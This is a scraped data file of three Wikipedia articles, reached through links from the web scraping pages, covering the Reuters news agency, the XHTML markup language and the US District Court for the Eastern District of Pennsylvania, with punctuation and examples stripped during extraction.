375 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Reuters | Reuters ( r t rz ROY-terz) is a news agency owned by Thomson Reuters. 1 2 It employs around 2,500 journalists and 600 photojournalists in about 200 locations worldwide writing in 16 languages. 3 Reuters is one of the largest and most trusted news agencies in the world. 4 5 6 The agency was established in London in 1851 by the German-born Paul Reuter. It was acquired by the Thomson Corporation of Canada in 2008 and now makes up the news media division of Thomson Reuters. 5 Paul Reuter worked at a book-publishing firm in Berlin and was involved in distributing radical pamphlets at the beginning of the Revolutions of 1848. These publications brought much attention to Reuter, who in 1850 developed a prototype news service in Aachen using homing pigeons and electric telegraphy from 1851 on, in order to transmit messages between Brussels and Aachen, 7 in what today is Aachen's Reuters House. Reuter moved to London in 1851 and established a news wire agency at the London Royal Exchange. Headquartered in London, Reuter's company initially covered commercial news, serving banks, brokerage houses, and business firms. 8 The first newspaper client to subscribe was the London Morning Advertiser in 1858, and more began to subscribe soon after. 8 9 According to the Encyclop dia Britannica: "the value of Reuters to newspapers lay not only in the financial news it provided but in its ability to be the first to report on stories of international importance. 8 It was the first to report Abraham Lincoln's assassination in Europe, for instance, in 1865. 8 10 In 1865, Reuter incorporated his private business, under the name Reuter's Telegram Company Limited; Reuter was appointed managing director of the company. 11 In 1870 the press agencies French Havas (founded in 1835), British Reuter's (founded in 1851) and German Wolff (founded in 1849) signed an agreement (known as the Ring Combination) that set 'reserved territories' for the three agencies. Each agency made its own separate contracts with national agencies or other subscribers within its territory. In practice, Reuters, who came up with the idea, tended to dominate the Ring Combination. Its influence was greatest because its reserved territories were larger or of greater news importance than most others. It also had more staff and stringers throughout the world and thus contributed more original news to the pool. British control of cable lines made London itself an unrivalled centre for world news, further enhanced by Britain's wide-ranging commercial, financial and imperial activities. 12 In 1872, Reuter's expanded into the Far East, followed by South America in 1874. Both expansions were made possible by advances in overland telegraphs and undersea cables. 10 In 1878, Reuter retired as managing director, and was succeeded by his eldest son, Herbert de Reuter. 11 In 1883, Reuter's began transmitting messages electrically to London newspapers. 10 Reuter's son Herbert de Reuter continued as general manager until his death by suicide in 1915. The company returned to private ownership in 1916, when all shares were purchased by Roderick Jones and Mark Napier; they renamed the company "Reuters Limited", dropping the apostrophe. 11 In 1919, a number of Reuters reports falsely described the anti-colonial March 1st Movement protests in Korea as violent Bolshevik uprisings. South Korean researchers found that a number of these reports were cited in a number of international newspapers and possibly negatively influenced international opinion on Korea. 13 In 1923, Reuters began using radio to transmit news internationally, a pioneering act. 10 In 1925, the Press Association (PA) of Great Britain acquired a majority interest in Reuters, and full ownership some years later. 8 During the world wars, The Guardian reported that Reuters: "came under pressure from the British government to serve national interests. In 1941, Reuters deflected the pressure by restructuring itself as a private company. 10 In 1941, the PA sold half of Reuters to the Newspaper Proprietors' Association, and co-ownership was expanded in 1947 to associations that represented daily newspapers in New Zealand and Australia. 8 The new owners formed the Reuters Trust. The Reuters Trust Principles were put in place to maintain the company's independence. 14 At that point, Reuters had become "one of the world's major news agencies, supplying both text and images to newspapers, other news agencies, and radio and television broadcasters. 8 Also at that point, it directly or through national news agencies provided service "to most countries, reaching virtually all the world's leading newspapers and many thousands of smaller ones", according to Britannica. 8 In 1961, Reuters scooped news of the erection of the Berlin Wall. 15 Reuters was one of the first news agencies to transmit financial data over oceans via computers in the 1960s. 8 In 1973, Reuters "began making computer-terminal displays of foreign-exchange rates available to clients. 8 In 1981, Reuters began supporting electronic transactions on its computer network and afterwards developed a number of electronic brokerage and trading services. 8 Reuters was floated as a public company in 1984, 15 when Reuters Trust was listed on the stock exchanges 10 such as the London Stock Exchange (LSE) and NASDAQ. 8 Reuters later published the first story of the Berlin Wall being breached in 1989. 15 Reuters was the dominant news service on the Internet in the 1990s. It earned this position by developing a partnership with ClariNet and Pointcast, two early Internet-based news providers. 16 Reuters' share price grew during the dotcom boom, then fell after the banking troubles in 2001. 10 In 2002, Britannica wrote that most news throughout the world came from three major agencies: the Associated Press, Reuters, and Agence France-Presse. 4 Until 2008, the Reuters news agency formed part of an independent company, Reuters Group plc. Reuters was acquired by Thomson Corporation in Canada in 2008, forming Thomson Reuters. 8 In 2009, Thomson Reuters withdrew from the LSE and the NASDAQ, instead listing its shares on the Toronto Stock Exchange (TSX) and the New York Stock Exchange (NYSE). 8 The last surviving member of the Reuters family founders, Marguerite, Baroness de Reuter, died at age 96 on 25 January 2009. 17 The parent company Thomson Reuters is headquartered in Toronto, and provides financial information to clients while also maintaining its traditional news-agency business. 8 In 2012, Thomson Reuters appointed Jim Smith as CEO. 14 In July 2016, Thomson Reuters agreed to sell its intellectual property and science operation for $3.55 billion to private equity firms. 18 In October 2016, Thomson Reuters announced expansions and relocations to Toronto. 18 As part of cuts and restructuring, in November 2016, Thomson Reuters Corp. eliminated 2,000 jobs worldwide out of its estimated 50,000 employees. 18 On 15 March 2020, Steve Hasker was appointed president and CEO. 19 In April 2021, Reuters announced that its website would go behind a paywall, following rivals who have done the same. 20 21 In March 2024, Gannett, the largest newspaper publisher in the United States, signed an agreement with Reuters to use the wire service's global content after cancelling its contract with the Associated Press. 22 In 2024, Reuters staff won the Pulitzer Prize for National Reporting for their work on Elon Musk and misconduct at his businesses, including SpaceX, Tesla, and Neuralink, as well as the Pulitzer Prize for Breaking News Photography for coverage of the Israel Hamas war. 23 Reuters employs some 2,500 journalists and 600 photojournalists 24 in about 200 locations worldwide. 25 26 5 Reuters journalists use the Standards and Values as a guide for fair presentation and disclosure of relevant interests, to "maintain the values of integrity and freedom upon which their reputation for reliability, accuracy, speed and exclusivity relies". 27 28 In May 2000, Kurt Schork, an American reporter, was killed in an ambush while on assignment in Sierra Leone. In April and August 2003, news cameramen Taras Protsyuk and Mazen Dana were killed in separate incidents by U.S. troops in Iraq. In July 2007, Namir Noor-Eldeen and Saeed Chmagh were killed when they were struck by fire from a U.S. military Apache helicopter in Baghdad. 29 30 During 2004, cameramen Adlan Khasanov was killed by Chechen separatists, and Dhia Najim was killed in Iraq. In April 2008, cameraman Fadel Shana was killed in the Gaza Strip after being hit by an Israeli tank. 31 32 While covering China's Cultural Revolution in Peking in the late 1960s for Reuters, journalist Anthony Grey was detained by the Chinese government in response to the jailing of several Chinese journalists by the colonial British government of Hong Kong. 33 He was released after being imprisoned for 27 months from 1967 to 1969 and was awarded an OBE by the British Government. After his release, he went on to become a best-selling historical novelist. 34 In May 2016, the Ukrainian website Myrotvorets published the names and personal data of 4,508 journalists, including Reuters reporters, and other media staff from all over the world, who were accredited by the self-proclaimed authorities in the separatist-controlled regions of eastern Ukraine. 35 In 2018, two Reuters journalists were convicted in Myanmar of obtaining state secrets while investigating a massacre in a Rohingya village. 36 The arrest and convictions were widely condemned as an attack on press freedom. The journalists, Wa Lone and Kyaw Soe Oo, received several awards, including the Foreign Press Association Media Award and the Pulitzer Prize for International Reporting, and were named as part of the Time Person of the Year for 2018 along with other persecuted journalists. 37 38 39 After 511 days in prison, Wa Lone and Kyaw Soe Oo were freed on 7 March 2019 after receiving a presidential pardon. 40 In February 2023, a team of Reuters journalists won the Selden Ring Award for their investigation that exposed human-rights abuses by the Nigerian military. 41 In 1977, Rolling Stone and The New York Times said that according to information from CIA officials, Reuters cooperated with the CIA. 43 44 45 In response to that, Reuters' then-managing director, Gerald Long, had asked for evidence of the charges, but none was provided, according to Reuters' then-managing editor for North America, 45 Desmond Maberly. 46 47 Reuters has a policy of taking a "value-neutral approach" which extends to not using the word terrorist in its stories. The practice attracted criticism following the September 11 attacks. 48 Reuters' editorial policy states: "Reuters may refer without attribution to terrorism and counterterrorism in general, but do not refer to specific events as terrorism. Nor does Reuters use the word terrorist without attribution to qualify specific individuals, groups or events. 49 By contrast, the Associated Press does use the term terrorist in reference to non-governmental organizations who carry out attacks on civilian populations. 48 In 2004, Reuters asked CanWest Global Communications, a Canadian newspaper chain, to remove Reuters' bylines, as the chain had edited Reuters articles to insert the word terrorist. A spokesman for Reuters stated: "My goal is to protect my reporters and protect our editorial integrity. 50 In July 2013, David Fogarty, former Reuters climate change correspondent in Asia, resigned after a career of almost 20 years with the company and wrote that "progressively, getting any climate change-themed story published got harder" following comments from then-deputy editor-in-chief Paul Ingrassia that he was a "climate change sceptic". In his comments, Fogarty stated: 51 52 53 By mid-October, I was informed that climate change just wasn't a big story for the present, but that it would be if there was a significant shift in global policy, such as the US introducing an emissions cap-and-trade system. Very soon after that conversation I was told my climate change role was abolished. Ingrassia, formerly Reuters' managing editor, previously worked for The Wall Street Journal and Dow Jones for 31 years. 54 55 Reuters responded to Fogarty's piece by stating: "Reuters has a number of staff dedicated to covering this story, including a team of specialist reporters at Point Carbon and a columnist. There has been no change in our editorial policy. 56 Subsequently, climate blogger Joe Romm cited a Reuters article on climate as employing "false balance", and quoted Stefan Rahmstorf, co-chair of Earth System Analysis at the Potsdam Institute that s imply, a lot of unrelated climate sceptics nonsense has been added to this Reuters piece. In the words of the late Steve Schneider, this is like adding some nonsense from the Flat Earth Society to a report about the latest generation of telecommunication satellites. It is absurd. Romm opined: "We can't know for certain who insisted on cramming this absurd and non-germane 'climate sceptics nonsense' into the piece, but we have a strong clue. If it had been part of the reporter's original reporting, you would have expected direct quotes from actual sceptics, because that is journalism 101. The fact that the blather was all inserted without attribution suggests it was added at the insistence of an editor. 57 According to Ynetnews, Reuters was accused of bias against Israel in its coverage of the 2006 Israel Lebanon conflict after the wire service used two doctored photos by a Lebanese freelance photographer, Adnan Hajj. 58 In August 2006, Reuters announced it had severed all ties with Hajj and said his photographs would be removed from its database. 59 60 In 2010, Reuters was criticised again by Haaretz for "anti-Israeli" bias when it cropped the edges of photos, removing commandos' knives held by activists and a naval commando's blood from photographs taken aboard the Mavi Marmara during the Gaza flotilla raid, a raid that left nine Turkish activists dead. It has been alleged that in two separate photographs, knives held by the activists were cropped out of the versions of the pictures published by Reuters. 61 Reuters said it is standard operating procedure to crop photos at the margins, and replaced the cropped images with the original ones after it was brought to the agency's attention. 61 On 9 June 2020, three Reuters journalists (Jack Stubbs, Raphael Satter and Christopher Bing) incorrectly used the image of an Indian herbal medicine entrepreneur in an exclusive story titled "Obscure Indian cyber firm spied on politicians, investors worldwide". 62 Indian local media picked up the report, and the man whose image was wrongly used was invited and interrogated for nine hours by Indian police. Reuters admitted to the error, but Raphael Satter claimed that they had mistaken the man for the suspected hacker Sumit Gupta because both men share same business address. A check by local media, however, showed that both men were in different buildings and not as claimed by Raphael Satter. 63 64 As the report of the inaccurate reporting trickled out to the public, Reuters' senior director of communication Heather Carpenter contacted media outlets asking them to take down their posts. 64 In March 2015, the Brazilian affiliate of Reuters released an excerpt from an interview with Brazilian ex-president Fernando Henrique Cardoso about Operation Car Wash (Portuguese: Opera o Lava Jato). In 2014, several politicians from Brazil were found to be involved in corruption, by accepting bribes from different corporations in exchange for Government contracts. After the scandal, the excerpt from Brazil's president Fernando Henrique's interview was released. One paragraph by a former Petrobras manager mentioned a comment, in which he suggested corruption in the company may date back to Cardoso's presidency. Attached, was a comment between parenthesis: "Podemos tirar se achar melhor" ("we can take it out if you think better"), 65 which was removed from the current version of the text. 66 This had the effect of confusing readers, and suggests that the former president was involved in corruption and the comment was attributed to him. Reuters later confirmed the error, and explained that the comment, originating from one of the local editors, was actually intended for the journalist who wrote the original text in English, and that it should not have been published. 67 In November 2019 the UK Foreign Office released archive documents confirming that it had provided funding to Reuters during the 1960s and 1970s so that Reuters could expand its coverage in the Middle East. An agreement was made between the Information Research Department (IRD) and Reuters for the UK Treasury to provide 350,000 over four years to fund Reuters' expansion. The UK government had already been funding the Latin American department of Reuters through a shell company; however, this method was discounted for the Middle East operation due to the accounting of the shell company looking suspicious, with the IRD stating that the company "already looks queer to anyone who might wish to investigate why such an inactive and unprofitable company continues to run. 68 Instead, the BBC was used to fund the project by paying for enhanced subscriptions to the news organisation, for which the Treasury would reimburse the BBC at a later date. The IRD acknowledged that this agreement would not give them editorial control over Reuters, although the IRD believed it would give them political influence over Reuters' work, stating "this influence would flow, at the top level, from Reuters' willingness to consult and to listen to views expressed on the results of its work. 68 69 On 1 June 2020, Reuters announced that Russian news agency TASS had joined its "Reuters Connect" programme, comprising a then-total of 18 partner agencies. Reuters president Michael Friedenberg said he was "delighted that TASS and Reuters are building upon our valued partnership". 70 Two years later, TASS's membership in Reuters Connect came under scrutiny in the wake of the 2022 Russian invasion of Ukraine; Politico reported that Reuters staff members were "frustrated and embarrassed" that their agency had not suspended its partnership with TASS. 71 On 23 March 2022, Reuters removed TASS from its "content marketplace". Matthew Keen, interim CEO of Reuters said "we believe making TASS content available on Reuters Connect is not aligned with the Thomson Reuters Trust Principles". 72 1 2 3 4 5 6 7 NBC News Wall Street Journal Politico MSNBC CNBC Telemundo Bloomberg Industry Group Washington Examiner Boston Globe Washington Blade Fox News CBS News Radio AP Radio PBS VOA Time Yahoo News Daily Caller EWTN CBS News Bloomberg News McClatchy NY Post TheGrio Washington Times Salem Radio CBN Cheddar News Hearst TV AP NPR Foreign pool The Hill Regionals Newsmax Gray TV Spectrum News ABC News Washington Post Agence France-Presse Fox Business Fox News Radio CSM Roll Call Al JazeeraNexstar Scripps News Reuters NY Times LA Times Univision AURN RealClearPolitics Daily Beast Dallas Morning News BBC Newsweek CNN USA Today ABC News RadioDaily Mail National JournalHuffPostFinancial Times The Guardian |
376 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/XHTML | Extensible HyperText Markup Language (XHTML) is part of the family of XML markup languages which mirrors or extends versions of the widely used HyperText Markup Language (HTML), the language in which Web pages are formulated. 1 While HTML, prior to HTML5, was defined as an application of Standard Generalized Markup Language (SGML), a flexible markup language framework, XHTML is an application of XML, a more restrictive subset of SGML. XHTML documents are well-formed and may therefore be parsed using standard XML parsers, unlike HTML, which requires a lenient HTML-specific parser. 2 XHTML 1.0 became a World Wide Web Consortium (W3C) recommendation on 26 January 2000. XHTML 1.1 became a W3C recommendation on 31 May 2001. XHTML is now referred to as "the XML syntax for HTML" 3 4 and being developed as an XML adaptation of the HTML living standard. 5 6 XHTML 1.0 was "a reformulation of the three HTML 4 document types as applications of XML 1.0". 7 The World Wide Web Consortium (W3C) also simultaneously maintained the HTML 4.01 Recommendation. In the XHTML 1.0 Recommendation document, as published and revised in August 2002, the W3C commented that "The XHTML family is the next step in the evolution of the Internet. By migrating to XHTML today, content developers can enter the XML world with all of its attendant benefits, while still remaining confident in their content's backward and future compatibility. 7 However, in 2005, the Web Hypertext Application Technology Working Group (WHATWG) formed, independently of the W3C, to work on advancing ordinary HTML not based on XHTML. The WHATWG eventually began working on a standard that supported both XML and non-XML serializations, HTML5, in parallel to W3C standards such as XHTML 2.0. In 2007, the W3C's HTML working group voted to officially recognize HTML5 and work on it as the next-generation HTML standard. 8 In 2009, the W3C allowed the XHTML 2.0 Working Group's charter to expire, acknowledging that HTML5 would be the sole next-generation HTML standard, including both XML and non-XML serializations. 9 Of the two serializations, the W3C suggests that most authors use the HTML syntax, rather than the XHTML syntax. 10 The W3C recommendations of both XHTML 1.0 and XHTML 1.1 were retired on 27 March 2018, 11 12 along with HTML 4.0, 13 HTML 4.01, 14 and HTML5. 15 XHTML was developed to make HTML more extensible and increase interoperability with other data formats. 16 In addition, browsers were forgiving of errors in HTML, and most websites were displayed despite technical errors in the markup; XHTML introduced stricter error handling. 17 HTML 4 was ostensibly an application of Standard Generalized Markup Language (SGML); however the specification for SGML was complex, and neither web browsers nor the HTML 4 Recommendation were fully conformant to it. 18 The XML standard, approved in 1998, provided a simpler data format closer in simplicity to HTML 4. 19 By shifting to an XML format, it was hoped HTML would become compatible with common XML tools; 20 servers and proxies would be able to transform content, as necessary, for constrained devices such as mobile phones. 21 By using namespaces, XHTML documents could provide extensibility by including fragments from other XML-based languages such as Scalable Vector Graphics and MathML. 22 Finally, the renewed work would provide an opportunity to divide HTML into reusable components (XHTML Modularization) and clean up untidy parts of the language. 23 There are various differences between XHTML and HTML. The Document Object Model (DOM) is a tree structure that represents the page internally in applications, and XHTML and HTML are two different ways of representing that in markup. Both are less expressive than the DOM for example, may be placed in comments in the DOM, but cannot be represented in a comment in either XHTML or HTML and generally, XHTML's XML syntax is more expressive than HTML (for example, arbitrary namespaces are not allowed in HTML). XHTML uses an XML syntax, while HTML uses a pseudo-SGML syntax (officially SGML for HTML 4 and under, but never in practice, and standardized away from SGML in HTML5). Because the expressible contents of the DOM in syntax are slightly different, there are some changes in actual behavior between the two models. Syntax differences, however, can be overcome by implementing an alternate translational framework within the markup. First, there are some differences in syntax: 24 In addition to the syntactical differences, there are some behavioral differences, mostly arising from the underlying differences in serialization. For example: The similarities between HTML 4.01 and XHTML 1.0 led many websites and content management systems to adopt the initial W3C XHTML 1.0 Recommendation. To aid authors in the transition, the W3C provided guidance on how to publish XHTML 1.0 documents in an HTML-compatible manner, and serve them to browsers that were not designed for XHTML. 28 29 Such "HTML-compatible" content is sent using the HTML media type (text html) rather than the official Internet media type for XHTML (application xhtml xml). When measuring the adoption of XHTML to that of regular HTML, therefore, it is important to distinguish whether it is media type usage or actual document contents that are being compared. 30 31 Most web browsers have mature support 32 for all of the possible XHTML media types. 33 The notable exception is Internet Explorer versions 8 and earlier by Microsoft; rather than rendering application xhtml xml content, a dialog box invites the user to save the content to disk instead. Both Internet Explorer 7 (released in 2006) and Internet Explorer 8 (released in March 2009) exhibit this behavior. 34 Microsoft developer Chris Wilson explained in 2005 that IE7's priorities were improved browser security and CSS support, and that proper XHTML support would be difficult to graft onto IE's compatibility-oriented HTML parser; 35 however, Microsoft added support for true XHTML in IE9. 36 As long as support is not widespread, most web developers avoid using XHTML that is not HTML-compatible, 37 so advantages of XML such as namespaces, faster parsing, and smaller-footprint browsers do not benefit the user. 38 39 40 In the early 2000s, some Web developers began to question why Web authors ever made the leap into authoring in XHTML. 41 42 43 Others countered that the problems ascribed to the use of XHTML could mostly be attributed to two main sources: the production of invalid XHTML documents by some Web authors and the lack of support for XHTML built into Internet Explorer 6. 44 45 They went on to describe the benefits of XML-based Web documents (i.e. XHTML) regarding searching, indexing, and parsing as well as future-proofing the Web itself. In October 2006, HTML inventor and W3C chair Tim Berners-Lee, introducing a major W3C effort to develop a new HTML specification, posted in his blog that t he attempt to get the world to switch to XML ... all at once didn't work. The large HTML-generating public did not move ... Some large communities did shift and are enjoying the fruits of well-formed systems ... The plan is to charter a completely new HTML group. 46 The current HTML5 working draft says "special attention has been given to defining clear conformance criteria for user agents in an effort to improve interoperability ... while at the same time updating the HTML specifications to address issues raised in the past few years. Ian Hickson, editor of the HTML5 specification criticizing the improper use of XHTML in 2002, 41 is a member of the group developing this specification and is listed as one of the co-editors of the current working draft. 47 Simon Pieters researched the XML-compliance of mobile browsers 48 and concluded "the claim that XHTML would be needed for mobile devices is simply a myth". December 1998 saw the publication of a W3C Working Draft entitled Reformulating HTML in XML. This introduced Voyager, the codename for a new markup language based on HTML 4, but adhering to the stricter syntax rules of XML. By February 1999 the name of the specification had changed to XHTML 1.0: The Extensible HyperText Markup Language, and in January 2000 it was officially adopted as a W3C Recommendation. 49 There are three formal Document Type Definitions (DTD) for XHTML 1.0, corresponding to the three different versions of HTML 4.01: The second edition of XHTML 1.0 became a W3C Recommendation in August 2002. 50 Modularization provides an abstract collection of components through which XHTML can be subsetted and extended. The feature is intended to help XHTML extend its reach onto emerging platforms, such as mobile devices and Web-enabled televisions. The initial draft of Modularization of XHTML became available in April 1999, and reached Recommendation status in April 2001. 51 The first modular XHTML variants were XHTML 1.1 and XHTML Basic 1.0. In October 2008 Modularization of XHTML was superseded by XHTML Modularization 1.1, which adds an XML Schema implementation. It was superseded by a second edition in July 2010. 52 XHTML 1.1 evolved out of the work surrounding the initial Modularization of XHTML specification. The W3C released the first draft in September 1999; the Recommendation status was reached in May 2001. 53 The modules combined within XHTML 1.1 effectively recreate XHTML 1.0 Strict, with the addition of ruby annotation elements (ruby, rbc, rtc, rb, rt and rp) to better support East-Asian languages. Other changes include the removal of the name attribute from the a and map elements, and (in the first edition of the language) the removal of the lang attribute in favor of xml:lang. Although XHTML 1.1 is largely compatible with XHTML 1.0 and HTML 4, in August 2002 the Working Group issued a formal Note advising that it should not be transmitted with the HTML media type. 54 With limited browser support for the alternate application xhtml xml media type, XHTML 1.1 proved unable to gain widespread use. In January 2009 a second edition of the document (XHTML Media Types Second Edition) was issued, relaxing this restriction and allowing XHTML 1.1 to be served as text html. 55 The second edition of XHTML 1.1 was issued on 23 November 2010, which addresses various errata and adds an XML Schema implementation not included in the original specification. 56 (It was first released briefly on 7 May 2009 as a "Proposed Edited Recommendation" 57 before being rescinded on 19 May due to unresolved issues.) Since information appliances may lack the system resources to implement all XHTML abstract modules, the W3C defined a feature-limited XHTML specification called XHTML Basic. It provides a minimal feature subset sufficient for the most common content-authoring. The specification became a W3C recommendation in December 2000. 58 Of all the versions of XHTML, XHTML Basic 1.0 provides the fewest features. With XHTML 1.1, it is one of the two first implementations of modular XHTML. In addition to the Core Modules (Structure, Text, Hypertext, and List), it implements the following abstract modules: Base, Basic Forms, Basic Tables, Image, Link, Metainformation, Object, Style Sheet, and Target. 59 60 XHTML Basic 1.1 replaces the Basic Forms Module with the Forms Module and adds the Intrinsic Events, Presentation, and Scripting modules. It also supports additional tags and attributes from other modules. This version became a W3C recommendation on 29 July 2008. 61 The current version of XHTML Basic is 1.1 Second Edition (23 November 2010), in which the language is re-implemented in the W3C's XML Schema language. This version also supports the lang attribute. 62 XHTML-Print, which became a W3C Recommendation in September 2006, is a specialized version of XHTML Basic designed for documents printed from information appliances to low-end printers. 63 XHTML Mobile Profile (abbreviated XHTML MP or XHTML-MP) is a third-party variant of the W3C's XHTML Basic specification. Like XHTML Basic, XHTML was developed for information appliances with limited system resources. In October 2001, a limited company called the Wireless Application Protocol Forum began adapting XHTML Basic for WAP 2.0, the second major version of the Wireless Application Protocol. WAP Forum based their DTD on the W3C's Modularization of XHTML, incorporating the same modules the W3C used in XHTML Basic 1.0—except for the Target Module. Starting with this foundation, the WAP Forum replaced the Basic Forms Module with a partial implementation of the Forms Module, added partial support for the Legacy and Presentation modules, and added full support for the Style Attribute Module. In 2002, the WAP Forum has subsumed into the Open Mobile Alliance (OMA), which continued to develop XHTML Mobile Profile as a component of their OMA Browsing Specification. To this version, finalized in 2004, the OMA added partial support for the Scripting Module and partial support for Intrinsic Events. XHTML MP 1.1 is part of v2.1 of the OMA Browsing Specification (1 November 2002). 64 This version, finalized on 27 February 2007, expands the capabilities of XHTML MP 1.1 with full support for the Forms Module and OMA Text Input Modes. XHTML MP 1.2 is part of v2.3 of the OMA Browsing Specification (13 March 2007). 64 XHTML MP 1.3 (finalized on 23 September 2008) uses the XHTML Basic 1.1 document type definition, which includes the Target Module. Events in this version of the specification are updated to DOM Level 3 specifications (i.e., they are platform- and language-neutral). The XHTML 2 Working Group considered the creation of a new language based on XHTML 1.1. 65 If XHTML 1.2 was created, it would include WAI-ARIA and role attributes to better support accessible web applications, and improved Semantic Web support through RDFa. The inputmode attribute from XHTML Basic 1.1, along with the target attribute (for specifying frame targets) might also be present. The XHTML2 WG had not been chartered to carry out the development of XHTML1.2. Since the W3C announced that it does not intend to recharter the XHTML2 WG, 9 and closed the WG in December 2010, this means that XHTML 1.2 proposal would not eventuate. Between August 2002 and July 2006, the W3C released eight Working Drafts of XHTML 2.0, a new version of XHTML able to make a clean break from the past by discarding the requirement of backward compatibility. This lack of compatibility with XHTML 1.x and HTML 4 caused some early controversy in the web developer community. 66 Some parts of the language (such as the role and RDFa attributes) were subsequently split out of the specification and worked on as separate modules, partially to help make the transition from XHTML 1.x to XHTML 2.0 smoother. The ninth draft of XHTML 2.0 was expected to appear in 2009, but on 2 July 2009, the W3C decided to let the XHTML2 Working Group charter expire by that year's end, effectively halting any further development of the draft into a standard. 9 Instead, XHTML 2.0 and its related documents were released as W3C Notes in 2010. 67 68 New features to have been introduced by XHTML 2.0 included: HTML5 grew independently of the W3C, through a loose group of browser manufacturers and other interested parties calling themselves the WHATWG, or Web Hypertext Application Technology Working Group. The key motive of the group was to create a platform for dynamic web applications; they considered XHTML 2.0 to be too document-centric, and not suitable for the creation of internet forum sites or online shops. 69 HTML5 has both a regular text html serialization and an XML serialization, which is also known as XHTML5. 70 The language is more compatible with HTML 4 and XHTML 1.x than XHTML 2.0, due to the decision to keep the existing HTML form elements and events model. It adds many new elements not found in XHTML 1.x, however, such as section and aside tags. The XHTML5 language, like HTML5, uses a DOCTYPE declaration without a DTD. Furthermore, the specification deprecates earlier XHTML DTDs by asking the browsers to replace them with one containing only entity definitions for named characters during parsing. 70 XHTML RDFa is an extended version of the XHTML markup language for supporting RDF through a collection of attributes and processing rules in the form of well-formed XML documents. This host language is one of the techniques used to develop Semantic Web content by embedding rich semantic markup. An XHTML document that conforms to an XHTML specification is said to be valid. Validity assures consistency in document code, which in turn eases processing, but does not necessarily ensure consistent rendering by browsers. A document can be checked for validity with the W3C Markup Validation Service (for XHTML5, the Validator. nu Living Validator should be used instead). In practice, many web development programs provide code validation based on the W3C standards. The root element of an XHTML document must be html, and must contain an xmlns attribute to associate it with the XHTML namespace. The namespace URI for XHTML is http: www.w3.org 1999 xhtml. The example tag below additionally features an xml:lang attribute to identify the document with a natural language: In order to validate an XHTML document, a Document Type Declaration, or DOCTYPE, may be used. A DOCTYPE declares to the browser the Document Type Definition (DTD) to which the document conforms. A Document Type Declaration should be placed before the root element. The system identifier part of the DOCTYPE, which in these examples is the URL that begins with http: , need only point to a copy of the DTD to use, if the validator cannot locate one based on the public identifier (the other quoted string). It does not need to be the specific URL that is in these examples; in fact, authors are encouraged to use local copies of the DTD files when possible. The public identifier, however, must be character-for-character the same as in the examples. A character encoding may be specified at the beginning of an XHTML document in the XML declaration when the document is served using the application xhtml xml MIME type. (If an XML document lacks encoding specification, an XML parser assumes that the encoding is UTF 8 or UTF 16, unless the encoding has already been determined by a higher protocol.) For example: The declaration may be optionally omitted because it declares its encoding the default encoding. However, if the document instead makes use of XML 1.1 or another character encoding, a declaration is necessary. Internet Explorer prior to version 7 enters quirks mode, if it encounters an XML declaration in a document served as text html. XHTML 1.x documents are mostly backward compatible with HTML 4 user agents when the appropriate guidelines are followed. XHTML 1.1 is essentially compatible, although the elements for ruby annotation are not part of the HTML 4 specification and thus generally ignored by HTML 4 browsers. Later XHTML 1.x modules such as those for the role attribute, RDFa, and WAI-ARIA degrade gracefully in a similar manner. XHTML 2.0 is significantly less compatible, although this can be mitigated to some degree through the use of scripting. (This can be simple one-liners, such as the use of document.createElement() to register a new HTML element within Internet Explorer, or complete JavaScript frameworks, such as the FormFaces implementation of XForms.) The following are examples of XHTML 1.0 Strict, with both having the same visual output. The former one follows the HTML Compatibility Guidelines of the XHTML Media Types Note while the latter one breaks backward compatibility, but provides cleaner markup. 55 Example 1. Example 2. Notes: HTML5 and XHTML5 serializations are largely inter-compatible if adhering to the stricter XHTML5 syntax, but there are some cases in which XHTML will not work as valid HTML5 (e.g., processing instructions are deprecated in HTML clarify , are treated as comments, and close on the first , whereas they are fully allowed in XML, are treated as their own type, and close on ? ). 71 |
377 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/United_States_District_Court_for_the_Eastern_District_of_Pennsylvania | The United States District Court for the Eastern District of Pennsylvania (in case citations, E.D. Pa.) is one of the original 13 federal judiciary districts created by the Judiciary Act of 1789. It originally sat in Independence Hall in Philadelphia as the United States District Court for the District of Pennsylvania, and is now located at the James Byrne Courthouse at 601 Market Street in Philadelphia. There are five Eastern District federal courtrooms in Pennsylvania: Philadelphia, Lancaster, Allentown, Reading, and Easton. The Court's jurisdiction includes nine counties in eastern Pennsylvania: Berks, Bucks, Chester, Delaware, Lancaster, Lehigh, Montgomery, Northampton, and Philadelphia counties. The district is a part of the Third Circuit, and appeals are taken to that Circuit, except for patent claims and claims against the U.S. government under the Tucker Act, which are appealed to the Federal Circuit. The chief judge for the Eastern Pennsylvania District Court is Mitchell S. Goldberg. The people in the district are represented by the United States attorney for the Eastern District of Pennsylvania. As of June 21, 2022 update , the U.S. attorney is Jacqueline C. Romero. 1 The United States District Court for the District of Pennsylvania was one of the original 13 courts established by the Judiciary Act of 1789, 1 Stat. 73, on September 24, 1789. 2 3 It was subdivided on April 20, 1818, by 3 Stat. 462, 2 3 into the Eastern and Western Districts to be headquartered in Philadelphia and Pittsburgh, respectively. 2 Portions of these districts were subsequently subdivided into the Middle District on March 2, 1901, by 31 Stat. 880. 3 At the time of its initial subdivision, presiding judge Richard Peters Jr. was reassigned to only the Eastern District. As of May 17, 2024 update : Chief judges have administrative responsibilities with respect to their district court. Unlike the Supreme Court, where one justice is specifically nominated to be chief, the office of chief judge rotates among the district court judges. To be chief, a judge must have been in active service on the court for at least one year, be under the age of 65, and have not previously served as chief judge. A vacancy is filled by the judge highest in seniority among the group of qualified judges. The chief judge serves for a term of seven years, or until age 70, whichever occurs first. The age restrictions are waived if no members of the court would otherwise be qualified for the position. When the office was created in 1948, the chief judge was the longest-serving judge who had not elected to retire, on what has since 1958 been known as senior status, or declined to serve as chief judge. After August 6, 1959, judges could not become or remain chief after turning 70 years old. The current rules have been in operation since October 1, 1982. |
